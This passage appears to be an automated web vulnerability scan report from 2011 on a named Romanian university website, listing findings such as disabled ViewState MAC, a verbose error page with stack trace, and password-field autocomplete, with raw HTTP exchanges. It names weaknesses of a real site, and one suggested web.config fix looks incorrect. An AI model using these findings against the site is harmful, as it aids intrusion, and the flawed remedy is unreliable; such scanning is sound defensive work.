onclick="document.location.href='/lista.aspx?t=Studenti-actuali-Prezentare'">L'offre d'enseignement</a> <ul class="dN"> </ul> </li> <li class="active"><a class="active" href="#" onclick="document.location.href='#'">Informations pour les étudiants</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Organizatii-studentesti" onclick="document.location.href='/lista.aspx?t=Organizatii-studentesti'">Organisations estudiantines</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Masterat-Prezentare" onclick="document.location.href='/lista.aspx?t=Masterat-Prezentare'"><span class="dN">Dans la section </span>Masterat<span class="dN">:</span></a> <ul class=""> <li class="active"><a class="active" href="#" onclick="document.location.href='#'">Coordonnés</a> <ul class="dN"> </ul> </li> <li class="active"><a class="active" href="#" onclick="document.location.href='#'">Informations pour les masterants</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=RezidentiatPrezentare" onclick="document.location.href='/lista.aspx?t=RezidentiatPrezentare'"><span class="dN">Dans la section </span>Résidentiat<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=RezidentiatDatedecontact" onclick="document.location.href='/Detaliu.aspx?t=RezidentiatDatedecontact'">Coordonnés</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Rezidentiat-informatii" onclick="document.location.href='/Detaliu.aspx?t=Rezidentiat-informatii'">Informations concernant le résidentiat</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Doctorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Doctorat-Prezentare'"><span class="dN">Dans la section </span>Doctorat<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Date-de-contact'">Présentation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale'">Organisation de l'École Doctorale</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale'">Fonctionnement de l'École Doctorale</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=DoctoratBiroudeConsiliereCariera" onclick="document.location.href='/lista.aspx?t=DoctoratBiroudeConsiliereCariera'">Département orientation professionnelle</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studii-posuniversitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Studii-posuniversitare-Prezentare'"><span class="dN">Dans la section </span>Cours post-universitaires <span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact'">Coordonnés</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Informatii-pentru-studii-postuniversitare" onclick="document.location.href='/Detaliu.aspx?t=Studii-posuniversitare-Informatii-pentru-studii-postuniversitare'">Informations concernant les études post-universitaires</a> <ul class="dN"> </ul> </li> </ul> </li> </ul> </li> <li class="active"><a class="active" href="#">Informations sur</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Universitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Universitare-Prezentare'"><span class="dN">Dans la section </span>Université <span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">Rectorat</a> <ul class="dN"> <li class="active"><a class="active" href="/Detaliu.aspx?t=Rectorat-Prezentare&eID=62&c=0&m=0&y=0" onclick="document.location.href='/Detaliu.aspx?t=Rectorat-Prezentare&eID=62&c=0&m=0&y=0'">Propos du Recteur</a></li> <l..
MAC is not Enabled in ViewState

MAC is not Enabled in ViewState
1 TOTAL
MEDIUM
Netsparker identified that the target web application does not use MAC validation in ViewState data.

Impact

An attacker can tamper with the application's state variables located in the ViewState data structure.

Remedy

ASP.NET uses a hash code based integrity solution called "ViewStateMac" to protect ViewState parameters against tampering attacks. You can implement this solution on a page or application level.

For page based protection, place the following directive at the top of affected page. 
<%@Page EnableViewStateMAC=true %>
You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file. 
<System.Web>
	<pages enableViewState="true">
</System.Web>

Remedy References

- /en

/en

http://umfcluj.ro/en

ViewState Version

.NET Framework 2.x

Request

GET /en HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=3r3mzz45lurz0df0glsnhy45; path=/; HttpOnly,Products=; expires=Mon, 18-Jul-2011 17:14:27 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:14:28 GMT
Content-Length: 39906



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>[en]umf</title>
<meta name="description" content="[en]Donec condimentum vestibulum libero. Praesent tellus. Donec lacinia aliquam mi. Suspendisse venenatis lobortis pede? Quisque quis ipsum. Vestibulum suscipit augue in elit rhoncus luctus. Vestibulum rutrum leo at purus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam ultrices. Nullam quam odio, accumsan quis, ultricies quis, venenatis at, justo. Integer posuere fringilla ipsum. Proin non pede ut metus tempor iaculis. Etiam velit quam, adipiscing eu, consectetur ut, commodo ut; erat. Duis porta. Praesent ullamcorper suscipit quam. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum vulputate.
" />
<meta name="keywords" content="[en]Curabitur orci enim; gravida vitae, interdum at, consequat eget, lorem? Suspendisse bibendum pellentesque elit. Duis in metus. Integer urna ante, scelerisque ut, ultricies sit amet, aliquet at, lorem? Sed nec orci! Donec lobortis nisi at nulla. In hac habitasse platea dictumst. Morbi sit amet nisi a felis dapibus pretium. Donec ipsum diam, eleifend quis; vestibulum nec, fermentum ac, urna. Etiam sem tortor, hendrerit auctor, sagittis id, iaculis id, est. Suspendisse vel arcu eu arcu auctor sodales. Praesent quis elit in purus mattis mollis.
" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link type="text/css" rel="stylesheet" href="/css/common.css" /><link type="text/css" rel="stylesheet" href="/css/paging.css" /><link type="text/css" rel="stylesheet" href="/css/simplemodal.css" /><link type="text/css" rel="stylesheet" href="/css/thickbox.css" /><link type="text/css" rel="stylesheet" href="/css/search.css" /> <script type="text/javascript" src="/js/search.js"></script> <script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript" src="/js/jquery-ui.js"></script>
<script type="text/javascript" src="/js/jquery.hoverIntent.js"></script>
<script type="text/javascript" src="/js/jquery.emptyOnFocus.js"></script>
<script type="text/javascript" src="/js/jquery.alphanumeric.js"></script>
<script type="text/javascript" src="/js/jquery.simplemodal.js"></script>
<script type="text/javascript" src="/js/jquery.validate.js"></script>
<script type="text/javascript" src="/js/jquery.thickbox.js"></script>
<script type="text/javascript" src="/js/common.js"></script>
<script type="text/javascript" src="/js/globalizationen-GB.js"></script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>


<title>

</title></head>
<body class="en-GB" id="home">
<form name="aspnetForm" method="post" action="default.aspx?lang=en" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYyNzU5NzVkZA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=PsRJDDMJscQZi9Ce6WIaqNcJm9qD4oZbuj0e0cvS49Oclg_D1D9Ia36SFWSTU_w_z5Hn_JRB35Zoryx_6ILPzzT48KU1&amp;t=634210472612724343" type="text/javascript"></script>

<div>

<input type="hidden" name="__SCROLLPOSITIONX" id="__SCROLLPOSITIONX" value="0" />
<input type="hidden" name="__SCROLLPOSITIONY" id="__SCROLLPOSITIONY" value="0" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALrxpOvAgLhw6AyAuzu3YUFAv/frr4K" />
</div>
<input type="hidden" id="hCulture" value="en-GB" />

<div id="headerAll">

<div id="header" class="easyclear">
<div id="ctl00_logo"><a href="/">UMF</a></div>



<div id="lang">
<ul>

<li><a class="fr-FR " href="/fr"><label>Francais</label><span></span></a></li>



<li><a class="en-GB active" href="/en"><label>English</label><span></span></a></li>



<li><a class="ro-RO " href="/ro"><label>Romana</label><span></span></a></li>



</ul>
</div>


<div>
<fieldset id="search">
<!--<legend>Cauta produse</legend>-->
<label for="ctl00_txSearch">Search in site</label>
<input id="txSearch" class="txSearch" type="text" onkeyup="searchOnEnter(event);" />
<input id="searchSubmit" class="button" type="button" onclick="doSearch();" />
</fieldset>
</div>

<div id="aboutNav">

<ul> <li class="active"><a class="active" href="/">Home page</a> <ul> </ul> </li> <li class=""><a class="" href="/sitemap.aspx">Sitemap</a> <ul> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Harta-Digitala">Digital Map</a> <ul> </ul> </li> </ul>
<hr />
</div>



<!--<div id="userNav">

<ul>
<li><a href="/Inregistrare.aspx">Sign up</a></li>
<li><a href="/Autentificare.aspx">Login</a></li>
</ul>

</div>-->



<!--<div id="inlineCartBar">
<div class="finalizeOrderDiv"><a class="finalizeOrder" href="/finalizareComanda.aspx">Checkout</a></div>
<div id="inlineCartWrapper">
<a id="showInlineCart" href="#inlineCartDetails">View cart</a>
<div id="inlineCart">
<ul><li></li></ul>
<div class="total easyclear">
<span>Total</span>
<strong></strong>
</div>
<div id="noProducts">There is no product in your cart</div>
<div id="buyButtons"></div>
<div class="hideBorder"></div>
</div>
</div>
<h4 class="noProducts">There is no product in your cart</h4> <span class="produseInCos"></span>
</div>-->



</div>

</div>
<!--<div id="wrapOuter">
<div class="tr">
<div class="bl">
<div class="br">-->
<div id="wrap" class="easyclear">



<!--<div id="breadcrumbs"></div>-->


<div id="leftSide">
<div id="tabs">
<ul> <li class=""><a class="" href="#">Information for</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Admitere-Prezentare" onclick="document.location.href='/lista.aspx?t=Admitere-Prezentare'"><span class="dN">In section </span>Admission<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">University Presentation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Admitere-2011" onclick="document.location.href='/Detaliu.aspx?t=Admitere-2011'">Application for 2011</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studenti-actuali-Prezentare" onclick="document.location.href='/lista.aspx?t=Studenti-actuali-Prezentare'"><span class="dN">In section </span>Current Students<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="#" onclick="document.location.href='#'">Educational Offer</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for Students</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Organizatii-studentesti" onclick="document.location.href='/lista.aspx?t=Organizatii-studentesti'">Student Organizations</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Masterat-Prezentare" onclick="document.location.href='/lista.aspx?t=Masterat-Prezentare'"><span class="dN">In section </span>Master’s Degree<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="#" onclick="document.location.href='#'">Contact Information </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for MA Students</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=RezidentiatPrezentare" onclick="document.location.href='/lista.aspx?t=RezidentiatPrezentare'"><span class="dN">In section </span>Residency<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=RezidentiatDatedecontact" onclick="document.location.href='/Detaliu.aspx?t=RezidentiatDatedecontact'">Contact Information</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information regarding Residency</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Doctorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Doctorat-Prezentare'"><span class="dN">In section </span>Doctoral Studies<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Date-de-contact'">Presentation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale'">Graduate School Organisation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale'">Graduate School activity </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=DoctoratBiroudeConsiliereCariera" onclick="document.location.href='/lista.aspx?t=DoctoratBiroudeConsiliereCariera'">Career orientation department</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studii-posuniversitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Studii-posuniversitare-Prezentare'"><span class="dN">In section </span>Post University Studies<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact'">Contact Information </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for Post University Studies </a> <ul class="dN"> </ul> </li> </ul> </li> </ul> </li> <li class=""><a class="" href="#">Information about</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Universitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Universitare-Prezentare'"><span class="dN">In section </span>University<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">The Rector’s Office</a> <ul class="dN"> <li class=""><a class="" href="/Detaliu.aspx?t=Rectorat-Prezentare&eID=62&c=0&m=0&y=0" onclick="document.location.href='/Detaliu.aspx?t=Rectorat-Prezentare..
Internal Server Error

Internal Server Error
1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /newsletter.aspx

/newsletter.aspx CONFIRMED

http://umfcluj.ro/newsletter.aspx?newEmail=

Request

POST /newsletter.aspx?newEmail= HTTP/1.1
Referer: http://umfcluj.ro/newsletter.aspx?newEmail=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 308
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWBQLBopjuAQLhw6AyAuzu3YUFArGcpLcEAv%2ffrr4K&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__VIEWSTATE=%2fwEPDwUKLTQzODg5NzM4Nw9kFgJmD2QWAgICD2QWAgIID2QWBAIDDxYCHgdWaXNpYmxlaGQCBQ8WAh8AaGRk&ctl00$cpBody$txEmail=&ctl00$hAction=&ctl00$txName=&ctl00$txNewsletter=

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:50 GMT
Content-Length: 5486


<html>
<head>
<title>The parameter 'address' cannot be an empty string.<br>Parameter name: address</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>The parameter 'address' cannot be an empty string.<br>Parameter name: address</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.ArgumentException: The parameter 'address' cannot be an empty string.<br>Parameter name: address<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[ArgumentException: The parameter 'address' cannot be an empty string.
Parameter name: address]
System.Net.Mail.MailAddress..ctor(String address, String displayName, Encoding displayNameEncoding) +1107953
System.Net.Mail.MailAddress..ctor(String address) +8
Netlogiq.Web.Newsletter.SaveSubscriber() +864
Netlogiq.Web.Newsletter.Page_Load(Object sender, EventArgs e) +199
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[ArgumentException]: The parameter 'address' cannot be an empty string.
Parameter name: address
at System.Net.Mail.MailAddress..ctor(String address, String displayName, Encoding displayNameEncoding)
at System.Net.Mail.MailAddress..ctor(String address)
at Netlogiq.Web.Newsletter.SaveSubscriber()
at Netlogiq.Web.Newsletter.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.newsletter_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_newsletter.aspx.cdcab7d2.0tgu9kdk.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
Auto Complete Enabled

Auto Complete Enabled
1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /Autentificare.aspx

/Autentificare.aspx CONFIRMED

http://umfcluj.ro/Autentificare.aspx?action=order

Identified Field Name

ctl00$cpBody$txPassword

Request

POST /Autentificare.aspx?action=order HTTP/1.1
Referer: http://umfcluj.ro/Autentificare.aspx?action=order
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 454
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCQLVqpWzDgLhw6AyAuzu3YUFAp33gboIArGcpLcEAvzY8J0GAv%2fFkO0CApr7npELAv%2ffrr4K&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__VIEWSTATE=%2fwEPDwUKMjAxNDYzNDEwMg9kFgJmD2QWAgICD2QWAgIID2QWBgIBDxYCHgdWaXNpYmxlZ2QCBA8WAh8AaGQCBQ8WAh8AaGRk&ctl00$cpBody$btnContNou=&ctl00$cpBody$btnMaiDeparte=&ctl00$cpBody$hAction=&ctl00$cpBody$txEmail=&ctl00$cpBody$txPassword=&ctl00$hAction=&ctl00$txName=&ctl00$txNewsletter=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:32 GMT
Content-Length: 38980



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content="" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link type="text/css" rel="stylesheet" href="/css/common.css" /><link type="text/css" rel="stylesheet" href="/css/paging.css" /><link type="text/css" rel="stylesheet" href="/css/simplemodal.css" /><link type="text/css" rel="stylesheet" href="/css/thickbox.css" /><link type="text/css" rel="stylesheet" href="/css/search.css" /> <script type="text/javascript" src="/js/search.js"></script> <script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript" src="/js/jquery-ui.js"></script>
<script type="text/javascript" src="/js/jquery.hoverIntent.js"></script>
<script type="text/javascript" src="/js/jquery.emptyOnFocus.js"></script>
<script type="text/javascript" src="/js/jquery.alphanumeric.js"></script>
<script type="text/javascript" src="/js/jquery.simplemodal.js"></script>
<script type="text/javascript" src="/js/jquery.validate.js"></script>
<script type="text/javascript" src="/js/jquery.thickbox.js"></script>
<script type="text/javascript" src="/js/common.js"></script>
<script type="text/javascript" src="/js/globalizationfr-FR.js"></script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>


<script type="text/javascript" src="/js/login.js"></script>
<script type="text/javascript" src="/js/validation.js"></script>
<title>

</title></head>
<body class="fr-FR" >
<form name="aspnetForm" method="post" action="Autentificare.aspx?action=order" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMjAxNDYzNDEwMg9kFgJmD2QWAgICD2QWAgIID2QWBgIBDxYCHgdWaXNpYmxlZ2QCBA8WAh8AaGQCBQ8WAh8AaGRk" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=PsRJDDMJscQZi9Ce6WIaqNcJm9qD4oZbuj0e0cvS49Oclg_D1D9Ia36SFWSTU_w_z5Hn_JRB35Zoryx_6ILPzzT48KU1&amp;t=634210472612724343" type="text/javascript"></script>

<div>

<input type="hidden" name="__SCROLLPOSITIONX" id="__SCROLLPOSITIONX" value="0" />
<input type="hidden" name="__SCROLLPOSITIONY" id="__SCROLLPOSITIONY" value="0" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWCQLVqpWzDgLhw6AyAuzu3YUFAp33gboIArGcpLcEAvzY8J0GAv/FkO0CApr7npELAv/frr4K" />
</div>
<input type="hidden" id="hCulture" value="fr-FR" />

<div id="headerAll">

<div id="header" class="easyclear">
<div id="ctl00_logo"><a href="/">UMF</a></div>



<div id="lang">
<ul>

<li><a class="fr-FR active" href="/fr"><label>Francais</label><span></span></a></li>



<li><a class="en-GB " href="/en"><label>English</label><span></span></a></li>



<li><a class="ro-RO " href="/ro"><label>Romana</label><span></span></a></li>



</ul>
</div>


<div>
<fieldset id="search">
<!--<legend>Cauta produse</legend>-->
<label for="ctl00_txSearch">Rechercher dans le site</label>
<input id="txSearch" class="txSearch" type="text" onkeyup="searchOnEnter(event);" />
<input id="searchSubmit" class="button" type="button" onclick="doSearch();" />
</fieldset>
</div>

<div id="aboutNav">

<ul> <li class="active"><a class="active" href="/fr">Page d'accueil</a> <ul> </ul> </li> <li class="active"><a class="active" href="/sitemap.aspx">Carte du site </a> <ul> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Harta-Digitala">Carte digitale</a> <ul> </ul> </li> </ul>
<hr />
</div>



<!--<div id="userNav">

<ul>
<li><a href="/Inregistrare.aspx">Regisztrálás</a></li>
<li><a href="/Autentificare.aspx">Belépés</a></li>
</ul>

</div>-->



<!--<div id="inlineCartBar">
<div class="finalizeOrderDiv"><a class="finalizeOrder" href="/finalizareComanda.aspx">Rendelés véglegesítése</a></div>
<div id="inlineCartWrapper">
<a id="showInlineCart" href="#inlineCartDetails">Kosár megtekintése</a>
<div id="inlineCart">
<ul><li></li></ul>
<div class="total easyclear">
<span>Részösszeg</span>
<strong></strong>
</div>
<div id="noProducts">Nincs termék a kosárban</div>
<div id="buyButtons"></div>
<div class="hideBorder"></div>
</div>
</div>
<h4 class="noProducts">Nincs termék a kosárban</h4> <span class="produseInCos"></span>
</div>-->



</div>

</div>
<!--<div id="wrapOuter">
<div class="tr">
<div class="bl">
<div class="br">-->
<div id="wrap" class="easyclear">


<div id="contextual" class="easyclear">
<img height="200" width="588" alt="" src="/Images/FCK/image/bgContextual.gif" /><br />

</div>


<!--<div id="breadcrumbs"></div>-->


<div id="leftSide">
<div id="tabs">
